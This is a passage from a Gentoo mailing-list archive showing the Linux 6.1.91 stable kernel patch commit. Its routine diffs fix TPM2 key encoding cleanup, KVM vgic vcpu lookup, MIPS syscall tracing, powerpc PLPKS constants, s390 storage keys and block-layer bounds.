+ 	 * trigger, so if it does there's something nefarious going on
+ 	 */
+ 	if (WARN(work - scratch + pub_len + priv_len + 14 > SCRATCH_SIZE,
+-		 "BUG: scratch buffer is too small"))
+-		return -EINVAL;
++		 "BUG: scratch buffer is too small")) {
++		ret = -EINVAL;
++		goto err;
++	}
+ 
+ 	work = asn1_encode_integer(work, end_work, options->keyhandle);
+ 	work = asn1_encode_octet_string(work, end_work, pub, pub_len);
+@@ -79,10 +84,18 @@ static int tpm2_key_encode(struct trusted_key_payload *payload,
+ 	work1 = payload->blob;
+ 	work1 = asn1_encode_sequence(work1, work1 + sizeof(payload->blob),
+ 				     scratch, work - scratch);
+-	if (WARN(IS_ERR(work1), "BUG: ASN.1 encoder failed"))
+-		return PTR_ERR(work1);
++	if (IS_ERR(work1)) {
++		ret = PTR_ERR(work1);
++		pr_err("BUG: ASN.1 encoder failed with %d\n", ret);
++		goto err;
++	}
+ 
++	kfree(scratch);
+ 	return work1 - payload->blob;
++
++err:
++	kfree(scratch);
++	return ret;
+ }
+ 
+ struct tpm2_key_context {


^ permalink raw reply related	[flat|nested] 161+ messages in thread
* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2024-05-17 11:36 Mike Pagano
  0 siblings, 0 replies; 161+ messages in thread
From: Mike Pagano @ 2024-05-17 11:36 UTC (permalink / raw
  To: gentoo-commits

commit:     2a5c10652268bf133990da069fc2ac7e72e4a50d
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Fri May 17 11:36:21 2024 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Fri May 17 11:36:21 2024 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=2a5c1065

Linux patch 6.1.91

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README             |    4 +
 1090_linux-6.1.91.patch | 9680 +++++++++++++++++++++++++++++++++++++++++++++++
 2 files changed, 9684 insertions(+)

diff --git a/0000_README b/0000_README
index 1123ae49..b8e8658e 100644
--- a/0000_README
+++ b/0000_README
@@ -403,6 +403,10 @@ Patch:  1089_linux-6.1.90.patch
 From:   https://www.kernel.org
 Desc:   Linux 6.1.90
 
+Patch:  1090_linux-6.1.91.patch
+From:   https://www.kernel.org
+Desc:   Linux 6.1.91
+
 Patch:  1500_XATTR_USER_PREFIX.patch
 From:   https://bugs.gentoo.org/show_bug.cgi?id=470644
 Desc:   Support for namespace user.pax.* on tmpfs.

diff --git a/1090_linux-6.1.91.patch b/1090_linux-6.1.91.patch
new file mode 100644
index 00000000..583a7a37
--- /dev/null
+++ b/1090_linux-6.1.91.patch
@@ -0,0 +1,9680 @@
+diff --git a/Documentation/devicetree/bindings/iio/health/maxim,max30102.yaml b/Documentation/devicetree/bindings/iio/health/maxim,max30102.yaml
+index c13c10c8d65da..eed0df9d3a232 100644
+--- a/Documentation/devicetree/bindings/iio/health/maxim,max30102.yaml
++++ b/Documentation/devicetree/bindings/iio/health/maxim,max30102.yaml
+@@ -42,7 +42,7 @@ allOf:
+       properties:
+         compatible:
+           contains:
+-            const: maxim,max30100
++            const: maxim,max30102
+     then:
+       properties:
+         maxim,green-led-current-microamp: false
+diff --git a/MAINTAINERS b/MAINTAINERS
+index ecf4d0c8f446e..4b19dfb5d2fd4 100644
+--- a/MAINTAINERS
++++ b/MAINTAINERS
+@@ -22557,6 +22557,7 @@ F:	include/xen/swiotlb-xen.h
+ 
+ XFS FILESYSTEM
+ C:	irc://irc.oftc.net/xfs
++M:	Leah Rumancik <leah.rumancik@gmail.com>
+ M:	Darrick J. Wong <djwong@kernel.org>
+ L:	linux-xfs@vger.kernel.org
+ S:	Supported
+diff --git a/Makefile b/Makefile
+index 7ae5cf9ec9e55..a7d90996e4125 100644
+--- a/Makefile
++++ b/Makefile
+@@ -1,7 +1,7 @@
+ # SPDX-License-Identifier: GPL-2.0
+ VERSION = 6
+ PATCHLEVEL = 1
+-SUBLEVEL = 90
++SUBLEVEL = 91
+ EXTRAVERSION =
+ NAME = Curry Ramen
+ 
+diff --git a/arch/arm/kernel/sleep.S b/arch/arm/kernel/sleep.S
+index a86a1d4f34618..93afd1005b43c 100644
+--- a/arch/arm/kernel/sleep.S
++++ b/arch/arm/kernel/sleep.S
+@@ -127,6 +127,10 @@ cpu_resume_after_mmu:
+ 	instr_sync
+ #endif
+ 	bl	cpu_init		@ restore the und/abt/irq banked regs
++#if defined(CONFIG_KASAN) && defined(CONFIG_KASAN_STACK)
++	mov	r0, sp
++	bl	kasan_unpoison_task_stack_below
++#endif
+ 	mov	r0, #0			@ return zero on success
+ 	ldmfd	sp!, {r4 - r11, pc}
+ ENDPROC(cpu_resume_after_mmu)
+diff --git a/arch/arm64/kvm/vgic/vgic-kvm-device.c b/arch/arm64/kvm/vgic/vgic-kvm-device.c
+index bf4b3d9631ce1..63731fb3d8f63 100644
+--- a/arch/arm64/kvm/vgic/vgic-kvm-device.c
++++ b/arch/arm64/kvm/vgic/vgic-kvm-device.c
+@@ -337,16 +337,12 @@ int kvm_register_vgic_device(unsigned long type)
+ int vgic_v2_parse_attr(struct kvm_device *dev, struct kvm_device_attr *attr,
+ 		       struct vgic_reg_attr *reg_attr)
+ {
+-	int cpuid;
++	int cpuid = FIELD_GET(KVM_DEV_ARM_VGIC_CPUID_MASK, attr->attr);
+ 
+-	cpuid = (attr->attr & KVM_DEV_ARM_VGIC_CPUID_MASK) >>
+-		 KVM_DEV_ARM_VGIC_CPUID_SHIFT;
+-
+-	if (cpuid >= atomic_read(&dev->kvm->online_vcpus))
+-		return -EINVAL;
+-
+-	reg_attr->vcpu = kvm_get_vcpu(dev->kvm, cpuid);
+ 	reg_attr->addr = attr->attr & KVM_DEV_ARM_VGIC_OFFSET_MASK;
++	reg_attr->vcpu = kvm_get_vcpu_by_id(dev->kvm, cpuid);
++	if (!reg_attr->vcpu)
++		return -EINVAL;
+ 
+ 	return 0;
+ }
+diff --git a/arch/arm64/net/bpf_jit_comp.c b/arch/arm64/net/bpf_jit_comp.c
+index 0ce5f13eabb1b..afb79209d4132 100644
+--- a/arch/arm64/net/bpf_jit_comp.c
++++ b/arch/arm64/net/bpf_jit_comp.c
+@@ -1679,15 +1679,15 @@ static void invoke_bpf_prog(struct jit_ctx *ctx, struct bpf_tramp_link *l,
+ 
+ 	emit_call(enter_prog, ctx);
+ 
++	/* save return value to callee saved register x20 */
++	emit(A64_MOV(1, A64_R(20), A64_R(0)), ctx);
++
+ 	/* if (__bpf_prog_enter(prog) == 0)
+ 	 *         goto skip_exec_of_prog;
+ 	 */
+ 	branch = ctx->image + ctx->idx;
+ 	emit(A64_NOP, ctx);
+ 
+-	/* save return value to callee saved register x20 */
+-	emit(A64_MOV(1, A64_R(20), A64_R(0)), ctx);
+-
+ 	emit(A64_ADD_I(1, A64_R(0), A64_SP, args_off), ctx);
+ 	if (!p->jited)
+ 		emit_addr_mov_i64(A64_R(1), (const u64)p->insnsi, ctx);
+diff --git a/arch/mips/include/asm/ptrace.h b/arch/mips/include/asm/ptrace.h
+index b3e4dd6be7e20..428b9f1cf1de2 100644
+--- a/arch/mips/include/asm/ptrace.h
++++ b/arch/mips/include/asm/ptrace.h
+@@ -157,7 +157,7 @@ static inline long regs_return_value(struct pt_regs *regs)
+ #define instruction_pointer(regs) ((regs)->cp0_epc)
+ #define profile_pc(regs) instruction_pointer(regs)
+ 
+-extern asmlinkage long syscall_trace_enter(struct pt_regs *regs, long syscall);
++extern asmlinkage long syscall_trace_enter(struct pt_regs *regs);
+ extern asmlinkage void syscall_trace_leave(struct pt_regs *regs);
+ 
+ extern void die(const char *, struct pt_regs *) __noreturn;
+diff --git a/arch/mips/kernel/asm-offsets.c b/arch/mips/kernel/asm-offsets.c
+index c4501897b870b..08342b9eccdbd 100644
+--- a/arch/mips/kernel/asm-offsets.c
++++ b/arch/mips/kernel/asm-offsets.c
+@@ -98,6 +98,7 @@ void output_thread_info_defines(void)
+ 	OFFSET(TI_CPU, thread_info, cpu);
+ 	OFFSET(TI_PRE_COUNT, thread_info, preempt_count);
+ 	OFFSET(TI_REGS, thread_info, regs);
++	OFFSET(TI_SYSCALL, thread_info, syscall);
+ 	DEFINE(_THREAD_SIZE, THREAD_SIZE);
+ 	DEFINE(_THREAD_MASK, THREAD_MASK);
+ 	DEFINE(_IRQ_STACK_SIZE, IRQ_STACK_SIZE);
+diff --git a/arch/mips/kernel/ptrace.c b/arch/mips/kernel/ptrace.c
+index 567aec4abac0f..a8e569830ec8d 100644
+--- a/arch/mips/kernel/ptrace.c
++++ b/arch/mips/kernel/ptrace.c
+@@ -1309,16 +1309,13 @@ long arch_ptrace(struct task_struct *child, long request,
+  * Notification of system call entry/exit
+  * - triggered by current->work.syscall_trace
+  */
+-asmlinkage long syscall_trace_enter(struct pt_regs *regs, long syscall)
++asmlinkage long syscall_trace_enter(struct pt_regs *regs)
+ {
+ 	user_exit();
+ 
+-	current_thread_info()->syscall = syscall;
+-
+ 	if (test_thread_flag(TIF_SYSCALL_TRACE)) {
+ 		if (ptrace_report_syscall_entry(regs))
+ 			return -1;
+-		syscall = current_thread_info()->syscall;
+ 	}
+ 
+ #ifdef CONFIG_SECCOMP
+@@ -1327,7 +1324,7 @@ asmlinkage long syscall_trace_enter(struct pt_regs *regs, long syscall)
+ 		struct seccomp_data sd;
+ 		unsigned long args[6];
+ 
+-		sd.nr = syscall;
++		sd.nr = current_thread_info()->syscall;
+ 		sd.arch = syscall_get_arch(current);
+ 		syscall_get_arguments(current, regs, args);
+ 		for (i = 0; i < 6; i++)
+@@ -1337,23 +1334,23 @@ asmlinkage long syscall_trace_enter(struct pt_regs *regs, long syscall)
+ 		ret = __secure_computing(&sd);
+ 		if (ret == -1)
+ 			return ret;
+-		syscall = current_thread_info()->syscall;
+ 	}
+ #endif
+ 
+ 	if (unlikely(test_thread_flag(TIF_SYSCALL_TRACEPOINT)))
+ 		trace_sys_enter(regs, regs->regs[2]);
+ 
+-	audit_syscall_entry(syscall, regs->regs[4], regs->regs[5],
++	audit_syscall_entry(current_thread_info()->syscall,
++			    regs->regs[4], regs->regs[5],
+ 			    regs->regs[6], regs->regs[7]);
+ 
+ 	/*
+ 	 * Negative syscall numbers are mistaken for rejected syscalls, but
+ 	 * won't have had the return value set appropriately, so we do so now.
+ 	 */
+-	if (syscall < 0)
++	if (current_thread_info()->syscall < 0)
+ 		syscall_set_return_value(current, regs, -ENOSYS, 0);
+-	return syscall;
++	return current_thread_info()->syscall;
+ }
+ 
+ /*
+diff --git a/arch/mips/kernel/scall32-o32.S b/arch/mips/kernel/scall32-o32.S
+index 18dc9b3450561..2c604717e6308 100644
+--- a/arch/mips/kernel/scall32-o32.S
++++ b/arch/mips/kernel/scall32-o32.S
+@@ -77,6 +77,18 @@ loads_done:
+ 	PTR_WD	load_a7, bad_stack_a7
+ 	.previous
+ 
++	/*
++	 * syscall number is in v0 unless we called syscall(__NR_###)
++	 * where the real syscall number is in a0
++	 */
++	subu	t2, v0,  __NR_O32_Linux
++	bnez	t2, 1f /* __NR_syscall at offset 0 */
++	LONG_S	a0, TI_SYSCALL($28)	# Save a0 as syscall number
++	b	2f
++1:
++	LONG_S	v0, TI_SYSCALL($28)	# Save v0 as syscall number
++2:
++
+ 	lw	t0, TI_FLAGS($28)	# syscall tracing enabled?
+ 	li	t1, _TIF_WORK_SYSCALL_ENTRY
+ 	and	t0, t1
+@@ -114,16 +126,7 @@ syscall_trace_entry:
+ 	SAVE_STATIC
+ 	move	a0, sp
+ 
+-	/*
+-	 * syscall number is in v0 unless we called syscall(__NR_###)
+-	 * where the real syscall number is in a0
+-	 */
+-	move	a1, v0
+-	subu	t2, v0,  __NR_O32_Linux
+-	bnez	t2, 1f /* __NR_syscall at offset 0 */
+-	lw	a1, PT_R4(sp)
+-
+-1:	jal	syscall_trace_enter
++	jal	syscall_trace_enter
+ 
+ 	bltz	v0, 1f			# seccomp failed? Skip syscall
+ 
+diff --git a/arch/mips/kernel/scall64-n32.S b/arch/mips/kernel/scall64-n32.S
+index 97456b2ca7dc3..97788859238c3 100644
+--- a/arch/mips/kernel/scall64-n32.S
++++ b/arch/mips/kernel/scall64-n32.S
+@@ -44,6 +44,8 @@ NESTED(handle_sysn32, PT_SIZE, sp)
+ 
+ 	sd	a3, PT_R26(sp)		# save a3 for syscall restarting
+ 
++	LONG_S	v0, TI_SYSCALL($28)     # Store syscall number
++
+ 	li	t1, _TIF_WORK_SYSCALL_ENTRY
+ 	LONG_L	t0, TI_FLAGS($28)	# syscall tracing enabled?
+ 	and	t0, t1, t0
+@@ -72,7 +74,6 @@ syscall_common:
+ n32_syscall_trace_entry:
+ 	SAVE_STATIC
+ 	move	a0, sp
+-	move	a1, v0
+ 	jal	syscall_trace_enter
+ 
+ 	bltz	v0, 1f			# seccomp failed? Skip syscall
+diff --git a/arch/mips/kernel/scall64-n64.S b/arch/mips/kernel/scall64-n64.S
+index e6264aa62e457..be11ea5cc67e0 100644
+--- a/arch/mips/kernel/scall64-n64.S
++++ b/arch/mips/kernel/scall64-n64.S
+@@ -46,6 +46,8 @@ NESTED(handle_sys64, PT_SIZE, sp)
+ 
+ 	sd	a3, PT_R26(sp)		# save a3 for syscall restarting
+ 
++	LONG_S	v0, TI_SYSCALL($28)     # Store syscall number
++
+ 	li	t1, _TIF_WORK_SYSCALL_ENTRY
+ 	LONG_L	t0, TI_FLAGS($28)	# syscall tracing enabled?
+ 	and	t0, t1, t0
+@@ -82,7 +84,6 @@ n64_syscall_exit:
+ syscall_trace_entry:
+ 	SAVE_STATIC
+ 	move	a0, sp
+-	move	a1, v0
+ 	jal	syscall_trace_enter
+ 
+ 	bltz	v0, 1f			# seccomp failed? Skip syscall
+diff --git a/arch/mips/kernel/scall64-o32.S b/arch/mips/kernel/scall64-o32.S
+index d3c2616cba226..7a5abb73e5312 100644
+--- a/arch/mips/kernel/scall64-o32.S
++++ b/arch/mips/kernel/scall64-o32.S
+@@ -79,6 +79,22 @@ loads_done:
+ 	PTR_WD	load_a7, bad_stack_a7
+ 	.previous
+ 
++	/*
++	 * absolute syscall number is in v0 unless we called syscall(__NR_###)
++	 * where the real syscall number is in a0
++	 * note: NR_syscall is the first O32 syscall but the macro is
++	 * only defined when compiling with -mabi=32 (CONFIG_32BIT)
++	 * therefore __NR_O32_Linux is used (4000)
++	 */
++
++	subu	t2, v0,  __NR_O32_Linux
++	bnez	t2, 1f /* __NR_syscall at offset 0 */
++	LONG_S	a0, TI_SYSCALL($28)	# Save a0 as syscall number
++	b	2f
++1:
++	LONG_S	v0, TI_SYSCALL($28)	# Save v0 as syscall number
++2:
++
+ 	li	t1, _TIF_WORK_SYSCALL_ENTRY
+ 	LONG_L	t0, TI_FLAGS($28)	# syscall tracing enabled?
+ 	and	t0, t1, t0
+@@ -113,22 +129,7 @@ trace_a_syscall:
+ 	sd	a7, PT_R11(sp)		# For indirect syscalls
+ 
+ 	move	a0, sp
+-	/*
+-	 * absolute syscall number is in v0 unless we called syscall(__NR_###)
+-	 * where the real syscall number is in a0
+-	 * note: NR_syscall is the first O32 syscall but the macro is
+-	 * only defined when compiling with -mabi=32 (CONFIG_32BIT)
+-	 * therefore __NR_O32_Linux is used (4000)
+-	 */
+-	.set	push
+-	.set	reorder
+-	subu	t1, v0,  __NR_O32_Linux
+-	move	a1, v0
+-	bnez	t1, 1f /* __NR_syscall at offset 0 */
+-	ld	a1, PT_R4(sp) /* Arg1 for __NR_syscall case */
+-	.set	pop
+-
+-1:	jal	syscall_trace_enter
++	jal	syscall_trace_enter
+ 
+ 	bltz	v0, 1f			# seccomp failed? Skip syscall
+ 
+diff --git a/arch/powerpc/platforms/pseries/iommu.c b/arch/powerpc/platforms/pseries/iommu.c
+index 1e5f083cdb720..5e00a3cde93b9 100644
+--- a/arch/powerpc/platforms/pseries/iommu.c
++++ b/arch/powerpc/platforms/pseries/iommu.c
+@@ -781,8 +781,16 @@ static void pci_dma_bus_setup_pSeriesLP(struct pci_bus *bus)
+ 	 * parent bus. During reboot, there will be ibm,dma-window property to
+ 	 * define DMA window. For kdump, there will at least be default window or DDW
+ 	 * or both.
++	 * There is an exception to the above. In case the PE goes into frozen
++	 * state, firmware may not provide ibm,dma-window property at the time
++	 * of LPAR boot up.
+ 	 */
+ 
++	if (!pdn) {
++		pr_debug("  no ibm,dma-window property !\n");
++		return;
++	}
++
+ 	ppci = PCI_DN(pdn);
+ 
+ 	pr_debug("  parent is %pOF, iommu_table: 0x%p\n",
+diff --git a/arch/powerpc/platforms/pseries/plpks.c b/arch/powerpc/platforms/pseries/plpks.c
+index 63a1e1fe01851..25f95440a773b 100644
+--- a/arch/powerpc/platforms/pseries/plpks.c
++++ b/arch/powerpc/platforms/pseries/plpks.c
+@@ -21,19 +21,6 @@
+ 
+ #include "plpks.h"
+ 
+-#define PKS_FW_OWNER	     0x1
+-#define PKS_BOOTLOADER_OWNER 0x2
+-#define PKS_OS_OWNER	     0x3
+-
+-#define LABEL_VERSION	    0
+-#define MAX_LABEL_ATTR_SIZE 16
+-#define MAX_NAME_SIZE	    239
+-#define MAX_DATA_SIZE	    4000
+-
+-#define PKS_FLUSH_MAX_TIMEOUT 5000 //msec
+-#define PKS_FLUSH_SLEEP	      10 //msec
+-#define PKS_FLUSH_SLEEP_RANGE 400
+-
+ static u8 *ospassword;
+ static u16 ospasswordlength;
+ 
+@@ -60,7 +47,7 @@ struct label_attr {
+ 
+ struct label {
+ 	struct label_attr attr;
+-	u8 name[MAX_NAME_SIZE];
++	u8 name[PLPKS_MAX_NAME_SIZE];
+ 	size_t size;
+ };
+ 
+@@ -123,7 +110,7 @@ static int pseries_status_to_err(int rc)
+ static int plpks_gen_password(void)
+ {
+ 	unsigned long retbuf[PLPAR_HCALL_BUFSIZE] = { 0 };
+-	u8 *password, consumer = PKS_OS_OWNER;
++	u8 *password, consumer = PLPKS_OS_OWNER;
+ 	int rc;
+ 
+ 	password = kzalloc(maxpwsize, GFP_KERNEL);
+@@ -159,22 +146,18 @@ static struct plpks_auth *construct_auth(u8 consumer)
+ {
+ 	struct plpks_auth *auth;
+ 
+-	if (consumer > PKS_OS_OWNER)
++	if (consumer > PLPKS_OS_OWNER)
+ 		return ERR_PTR(-EINVAL);
+ 
+-	auth = kmalloc(struct_size(auth, password, maxpwsize), GFP_KERNEL);
++	auth = kzalloc(struct_size(auth, password, maxpwsize), GFP_KERNEL);
+ 	if (!auth)
+ 		return ERR_PTR(-ENOMEM);
+ 
+ 	auth->version = 1;
+ 	auth->consumer = consumer;
+-	auth->rsvd0 = 0;
+-	auth->rsvd1 = 0;
+ 
+-	if (consumer == PKS_FW_OWNER || consumer == PKS_BOOTLOADER_OWNER) {
+-		auth->passwordlength = 0;
++	if (consumer == PLPKS_FW_OWNER || consumer == PLPKS_BOOTLOADER_OWNER)
+ 		return auth;
+-	}
+ 
+ 	memcpy(auth->password, ospassword, ospasswordlength);
+ 
+@@ -193,7 +176,7 @@ static struct label *construct_label(char *component, u8 varos, u8 *name,
+ 	struct label *label;
+ 	size_t slen;
+ 
+-	if (!name || namelen > MAX_NAME_SIZE)
++	if (!name || namelen > PLPKS_MAX_NAME_SIZE)
+ 		return ERR_PTR(-EINVAL);
+ 
+ 	slen = strlen(component);
+@@ -207,9 +190,9 @@ static struct label *construct_label(char *component, u8 varos, u8 *name,
+ 	if (component)
+ 		memcpy(&label->attr.prefix, component, slen);
+ 
+-	label->attr.version = LABEL_VERSION;
++	label->attr.version = PLPKS_LABEL_VERSION;
+ 	label->attr.os = varos;
+-	label->attr.length = MAX_LABEL_ATTR_SIZE;
++	label->attr.length = PLPKS_MAX_LABEL_ATTR_SIZE;
+ 	memcpy(&label->name, name, namelen);
+ 
+ 	label->size = sizeof(struct label_attr) + namelen;
+@@ -271,10 +254,9 @@ static int plpks_confirm_object_flushed(struct label *label,
+ 		if (!rc && status == 1)
+ 			break;
+ 
+-		usleep_range(PKS_FLUSH_SLEEP,
+-			     PKS_FLUSH_SLEEP + PKS_FLUSH_SLEEP_RANGE);
+-		timeout = timeout + PKS_FLUSH_SLEEP;
+-	} while (timeout < PKS_FLUSH_MAX_TIMEOUT);
++		fsleep(PLPKS_FLUSH_SLEEP);
++		timeout = timeout + PLPKS_FLUSH_SLEEP;
++	} while (timeout < PLPKS_MAX_TIMEOUT);
+ 
+ 	rc = pseries_status_to_err(rc);
+ 
+@@ -289,13 +271,13 @@ int plpks_write_var(struct plpks_var var)
+ 	int rc;
+ 
+ 	if (!var.component || !var.data || var.datalen <= 0 ||
+-	    var.namelen > MAX_NAME_SIZE || var.datalen > MAX_DATA_SIZE)
++	    var.namelen > PLPKS_MAX_NAME_SIZE || var.datalen > PLPKS_MAX_DATA_SIZE)
+ 		return -EINVAL;
+ 
+-	if (var.policy & SIGNEDUPDATE)
++	if (var.policy & PLPKS_SIGNEDUPDATE)
+ 		return -EINVAL;
+ 
+-	auth = construct_auth(PKS_OS_OWNER);
++	auth = construct_auth(PLPKS_OS_OWNER);
+ 	if (IS_ERR(auth))
+ 		return PTR_ERR(auth);
+ 
+@@ -331,10 +313,10 @@ int plpks_remove_var(char *component, u8 varos, struct plpks_var_name vname)
+ 	struct label *label;
+ 	int rc;
+ 
+-	if (!component || vname.namelen > MAX_NAME_SIZE)
++	if (!component || vname.namelen > PLPKS_MAX_NAME_SIZE)
+ 		return -EINVAL;
+ 
+-	auth = construct_auth(PKS_OS_OWNER);
++	auth = construct_auth(PLPKS_OS_OWNER);
+ 	if (IS_ERR(auth))
+ 		return PTR_ERR(auth);
+ 
+@@ -370,14 +352,14 @@ static int plpks_read_var(u8 consumer, struct plpks_var *var)
+ 	u8 *output;
+ 	int rc;
+ 
+-	if (var->namelen > MAX_NAME_SIZE)
++	if (var->namelen > PLPKS_MAX_NAME_SIZE)
+ 		return -EINVAL;
+ 
+ 	auth = construct_auth(consumer);
+ 	if (IS_ERR(auth))
+ 		return PTR_ERR(auth);
+ 
+-	if (consumer == PKS_OS_OWNER) {
++	if (consumer == PLPKS_OS_OWNER) {
+ 		label = construct_label(var->component, var->os, var->name,
+ 					var->namelen);
+ 		if (IS_ERR(label)) {
+@@ -392,7 +374,7 @@ static int plpks_read_var(u8 consumer, struct plpks_var *var)
+ 		goto out_free_label;
+ 	}
+ 
+-	if (consumer == PKS_OS_OWNER)
++	if (consumer == PLPKS_OS_OWNER)
+ 		rc = plpar_hcall(H_PKS_READ_OBJECT, retbuf, virt_to_phys(auth),
+ 				 virt_to_phys(label), label->size, virt_to_phys(output),
+ 				 maxobjsize);
+@@ -434,17 +416,17 @@ static int plpks_read_var(u8 consumer, struct plpks_var *var)
+ 
+ int plpks_read_os_var(struct plpks_var *var)
+ {
+-	return plpks_read_var(PKS_OS_OWNER, var);
++	return plpks_read_var(PLPKS_OS_OWNER, var);
+ }
+ 
+ int plpks_read_fw_var(struct plpks_var *var)
+ {
+-	return plpks_read_var(PKS_FW_OWNER, var);
++	return plpks_read_var(PLPKS_FW_OWNER, var);
+ }
+ 
+ int plpks_read_bootloader_var(struct plpks_var *var)
+ {
+-	return plpks_read_var(PKS_BOOTLOADER_OWNER, var);
++	return plpks_read_var(PLPKS_BOOTLOADER_OWNER, var);
+ }
+ 
+ static __init int pseries_plpks_init(void)
+diff --git a/arch/powerpc/platforms/pseries/plpks.h b/arch/powerpc/platforms/pseries/plpks.h
+index 275ccd86bfb5e..07278a990c2df 100644
+--- a/arch/powerpc/platforms/pseries/plpks.h
++++ b/arch/powerpc/platforms/pseries/plpks.h
+@@ -12,14 +12,39 @@
+ #include <linux/types.h>
+ #include <linux/list.h>
+ 
+-#define OSSECBOOTAUDIT 0x40000000
+-#define OSSECBOOTENFORCE 0x20000000
+-#define WORLDREADABLE 0x08000000
+-#define SIGNEDUPDATE 0x01000000
++// Object policy flags from supported_policies
++#define PLPKS_OSSECBOOTAUDIT	PPC_BIT32(1) // OS secure boot must be audit/enforce
++#define PLPKS_OSSECBOOTENFORCE	PPC_BIT32(2) // OS secure boot must be enforce
++#define PLPKS_PWSET		PPC_BIT32(3) // No access without password set
++#define PLPKS_WORLDREADABLE	PPC_BIT32(4) // Readable without authentication
++#define PLPKS_IMMUTABLE		PPC_BIT32(5) // Once written, object cannot be removed
++#define PLPKS_TRANSIENT		PPC_BIT32(6) // Object does not persist through reboot
++#define PLPKS_SIGNEDUPDATE	PPC_BIT32(7) // Object can only be modified by signed updates
++#define PLPKS_HVPROVISIONED	PPC_BIT32(28) // Hypervisor has provisioned this object
+ 
+-#define PLPKS_VAR_LINUX	0x02
++// Signature algorithm flags from signed_update_algorithms
++#define PLPKS_ALG_RSA2048	PPC_BIT(0)
++#define PLPKS_ALG_RSA4096	PPC_BIT(1)
++
++// Object label OS metadata flags
++#define PLPKS_VAR_LINUX		0x02
+ #define PLPKS_VAR_COMMON	0x04
+ 
++// Flags for which consumer owns an object is owned by
++#define PLPKS_FW_OWNER			0x1
++#define PLPKS_BOOTLOADER_OWNER		0x2
++#define PLPKS_OS_OWNER			0x3
++
++// Flags for label metadata fields
++#define PLPKS_LABEL_VERSION		0
++#define PLPKS_MAX_LABEL_ATTR_SIZE	16
++#define PLPKS_MAX_NAME_SIZE		239
++#define PLPKS_MAX_DATA_SIZE		4000
++
++// Timeouts for PLPKS operations
++#define PLPKS_MAX_TIMEOUT		(5 * USEC_PER_SEC)
++#define PLPKS_FLUSH_SLEEP		10000 // usec
++
+ struct plpks_var {
+ 	char *component;
+ 	u8 *name;
+diff --git a/arch/s390/include/asm/dwarf.h b/arch/s390/include/asm/dwarf.h
+index 4f21ae561e4dd..390906b8e386e 100644
+--- a/arch/s390/include/asm/dwarf.h
++++ b/arch/s390/include/asm/dwarf.h
+@@ -9,6 +9,7 @@
+ #define CFI_DEF_CFA_OFFSET	.cfi_def_cfa_offset
+ #define CFI_ADJUST_CFA_OFFSET	.cfi_adjust_cfa_offset
+ #define CFI_RESTORE		.cfi_restore
++#define CFI_REL_OFFSET		.cfi_rel_offset
+ 
+ #ifdef CONFIG_AS_CFI_VAL_OFFSET
+ #define CFI_VAL_OFFSET		.cfi_val_offset
+diff --git a/arch/s390/kernel/vdso64/vdso_user_wrapper.S b/arch/s390/kernel/vdso64/vdso_user_wrapper.S
+index 97f0c0a669a59..0625381359df4 100644
+--- a/arch/s390/kernel/vdso64/vdso_user_wrapper.S
++++ b/arch/s390/kernel/vdso64/vdso_user_wrapper.S
+@@ -23,8 +23,10 @@ __kernel_\func:
+ 	CFI_DEF_CFA_OFFSET (STACK_FRAME_OVERHEAD + WRAPPER_FRAME_SIZE)
+ 	CFI_VAL_OFFSET 15, -STACK_FRAME_OVERHEAD
+ 	stg	%r14,STACK_FRAME_OVERHEAD(%r15)
++	CFI_REL_OFFSET 14, STACK_FRAME_OVERHEAD
+ 	brasl	%r14,__s390_vdso_\func
+ 	lg	%r14,STACK_FRAME_OVERHEAD(%r15)
++	CFI_RESTORE 14
+ 	aghi	%r15,WRAPPER_FRAME_SIZE
+ 	CFI_DEF_CFA_OFFSET STACK_FRAME_OVERHEAD
+ 	CFI_RESTORE 15
+diff --git a/arch/s390/mm/gmap.c b/arch/s390/mm/gmap.c
+index 662cf23a1b44b..59657e0363e7c 100644
+--- a/arch/s390/mm/gmap.c
++++ b/arch/s390/mm/gmap.c
+@@ -2642,7 +2642,7 @@ static int __s390_enable_skey_hugetlb(pte_t *pte, unsigned long addr,
+ 		return 0;
+ 
+ 	start = pmd_val(*pmd) & HPAGE_MASK;
+-	end = start + HPAGE_SIZE - 1;
++	end = start + HPAGE_SIZE;
+ 	__storage_key_init_range(start, end);
+ 	set_bit(PG_arch_1, &page->flags);
+ 	cond_resched();
+diff --git a/arch/s390/mm/hugetlbpage.c b/arch/s390/mm/hugetlbpage.c
+index c299a18273ffe..33ef6790114ab 100644
+--- a/arch/s390/mm/hugetlbpage.c
++++ b/arch/s390/mm/hugetlbpage.c
+@@ -139,7 +139,7 @@ static void clear_huge_pte_skeys(struct mm_struct *mm, unsigned long rste)
+ 	}
+ 
+ 	if (!test_and_set_bit(PG_arch_1, &page->flags))
+-		__storage_key_init_range(paddr, paddr + size - 1);
++		__storage_key_init_range(paddr, paddr + size);
+ }
+ 
+ void set_huge_pte_at(struct mm_struct *mm, unsigned long addr,
+diff --git a/block/blk-iocost.c b/block/blk-iocost.c
+index e6557024e3da8..64b594d660b79 100644
+--- a/block/blk-iocost.c
++++ b/block/blk-iocost.c
+@@ -1331,7 +1331,7 @@ static bool iocg_kick_delay(struct ioc_gq *iocg, struct ioc_now *now)
+ {
+ 	struct ioc *ioc = iocg->ioc;
+ 	struct blkcg_gq *blkg = iocg_to_blkg(iocg);
+-	u64 tdelta, delay, new_delay;
++	u64 tdelta, delay, new_delay, shift;
+ 	s64 vover, vover_pct;
+ 	u32 hwa;
+ 
+@@ -1346,8 +1346,9 @@ static bool iocg_kick_delay(struct ioc_gq *iocg, struct ioc_now *now)
+ 
+ 	/* calculate the current delay in effect - 1/2 every second */
+ 	tdelta = now->now - iocg->delay_at;
+-	if (iocg->delay)
+-		delay = iocg->delay >> div64_u64(tdelta, USEC_PER_SEC);
++	shift = div64_u64(tdelta, USEC_PER_SEC);
++	if (iocg->delay && shift < BITS_PER_LONG)
++		delay = iocg->delay >> shift;
+ 	else
+ 		delay = 0;
+ 
+diff --git a/block/ioctl.c b/block/ioctl.c
+index 47567ba1185a6..99b8e2e448729 100644
+--- a/block/ioctl.c
++++ b/block/ioctl.c
+@@ -89,7 +89,7 @@ static int blk_ioctl_discard(struct block_device *bdev, fmode_t mode,
+ 		unsigned long arg)
+ {
+ 	uint64_t range[2];
+-	uint64_t start, len;
++	uint64_t start, len, end;
